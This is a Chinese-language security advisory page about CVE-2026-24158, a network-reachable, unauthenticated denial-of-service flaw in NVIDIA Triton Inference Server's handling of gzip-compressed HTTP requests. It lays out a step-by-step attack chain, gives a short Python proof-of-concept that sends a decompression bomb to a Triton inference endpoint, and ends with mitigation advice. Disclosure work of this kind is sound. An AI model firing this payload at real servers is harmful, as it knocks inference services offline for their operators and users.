IPBUF安全漏洞报告
English
CVE-2026-24158 CVSS 7.5 高危

CVE-2026-24158 NVIDIA Triton Inference Server 拒绝服务漏洞

披露日期: 2026-03-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-24158
漏洞类型
拒绝服务
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
NVIDIA Triton Inference Server

相关标签

CVE-2026-24158拒绝服务DoSNVIDIATriton Inference Server资源耗尽解压炸弹

漏洞概述

NVIDIA Triton Inference Server在HTTP端点处理压缩载荷时存在安全漏洞。由于未对解压后的数据大小进行有效限制,攻击者可以通过网络发送特制的大型压缩数据包。利用此漏洞无需身份认证或用户交互。攻击成功后,服务器因资源耗尽而崩溃或无响应,导致拒绝服务,严重影响系统可用性。

技术细节

该漏洞源于NVIDIA Triton Inference Server的HTTP接口在处理压缩请求(如Gzip编码)时,缺乏对解压膨胀率的合理限制。攻击者利用“解压炸弹”原理,构造一个体积较小但解压后极大的恶意文件。当服务器接收到此载荷并尝试解压处理时,会消耗大量的CPU和内存资源。由于攻击向量为AV:N/AC:L/PR:N/UI:N,表明攻击门槛低,攻击者只需发送恶意数据包即可触发漏洞。这种资源耗尽会导致服务线程阻塞或进程终止,从而实现拒绝服务攻击。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,发现暴露在互联网上的NVIDIA Triton Inference Server HTTP端点。
STEP 2
2. 构造载荷
攻击者编写脚本,生成一个具有极高压缩比的恶意文件(解压炸弹),该文件在传输时很小,但解压后会占用大量内存。
STEP 3
3. 发送请求
攻击者向目标服务器的HTTP接口发送包含恶意压缩载荷的POST请求,无需任何身份认证。
STEP 4
4. 触发漏洞
服务器尝试解压并处理该载荷,导致CPU和内存资源被瞬间耗尽,服务进程崩溃或停止响应,造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import gzip import requests # Target URL (Replace with actual server address) target_url = "http://target-triton-server:8000/v2/models/infer" # Create a large payload (e.g., 100MB of 'A's) # This simulates the decompressed bomb original_size = 100 * 1024 * 1024 large_payload = b'A' * original_size # Compress the payload to make it small enough for network transfer compressed_payload = gzip.compress(large_payload) print(f"Original size: {len(large_payload)}, Compressed size: {len(compressed_payload)}") # Send the malicious request headers = { "Content-Encoding": "gzip", "Content-Type": "application/json" } try: response = requests.post(target_url, data=compressed_payload, headers=headers) print(f"Status Code: {response.status_code}") except Exception as e: print(f"Request failed (Server likely crashed): {e}")

影响范围

NVIDIA Triton Inference Server (具体受影响版本请参考NVIDIA官方安全公告)

防御指南

临时缓解措施
如果无法立即升级,建议在网络边界部署防火墙规则,限制传入HTTP请求的大小,特别是对Content-Encoding为gzip的请求进行严格的大小检查。同时,监控服务器资源使用情况,一旦发现异常峰值自动阻断来源IP。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表